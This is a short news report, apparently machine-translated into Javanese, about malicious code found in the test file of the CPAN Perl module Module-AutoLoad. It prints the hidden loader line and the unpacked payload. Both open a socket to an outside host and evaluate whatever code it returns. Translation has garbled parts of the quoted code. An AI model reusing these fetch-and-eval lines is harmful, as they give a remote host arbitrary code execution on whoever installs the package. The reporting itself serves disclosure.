Ing paket Perl sing disebarake liwat direktori CPAN Modul-Muat Otomatis, dirancang kanggo mbukak modul CPAN kanthi otomatis kanthi cepet, dikenali kode angkoro. Sisipan angkoro yaiku ketemu ing kode test 05_rcx.t, sing wis dikirim wiwit 2011.
Wigati dimangerteni manawa ana pitakonan babagan ngemot kode sing bisa dipertanyakan Stackoverflow bali ing 2016.
Kode sing ditemtokake nyebabake skrip dieksekusi ../contrib/RCX.pl, isine dikurangi dadi baris:
gunakake lib do {eval<$b>&&botstrap("RCX") if$b= new IO :: Socket :: INET 82.46.99.88.":1β³};
Skrip iki dimuat bingung nggunakake layanan perlobfuscator.com kode saka r.cx inang external (kode karakter 82.46.99.88 cocog kanggo teks "R.cX") lan kaleksanan ing pemblokiran eval.
Sawise unpacking, ing ngisor iki pungkasanipun kaleksanan: kode:
print{$b=new IO::Socket::INET"ww.limera1n.com:80β³}"GET /iJailBreak
"; evalor bali warn$@while$b;1
Paket masalah saiki wis dibusak saka repositori. Ngaso (Perl Authors Upload Server), lan akun penulis modul diblokir. Ing kasus iki, modul isih tetep kasedhiya ing arsip MetaCPAN lan bisa langsung diinstal saka MetaCPAN nggunakake sawetara keperluan kayata cpanminus. Wis kacathetyen paket kasebut ora disebarake kanthi akeh.
Menarik kanggo rembugan disambungake lan penulis modul, sing mbantah informasi sing kode angkoro dilebokake sawise situs "r.cx" disusupi lan nerangake yen dheweke mung seneng-seneng, lan nggunakake perlobfuscator.com ora kanggo ndhelikake soko, nanging kanggo nyuda ukuran. kode lan nyederhanakake nyalin liwat clipboard. Pilihan jeneng fungsi "botstrap" diterangake kanthi kasunyatan manawa tembung iki "katon kaya bot lan luwih cendhek tinimbang bootstrap." Penulis modul kasebut uga njamin yen manipulasi sing diidentifikasi ora nindakake tumindak ala, nanging mung nduduhake loading lan eksekusi kode liwat TCP.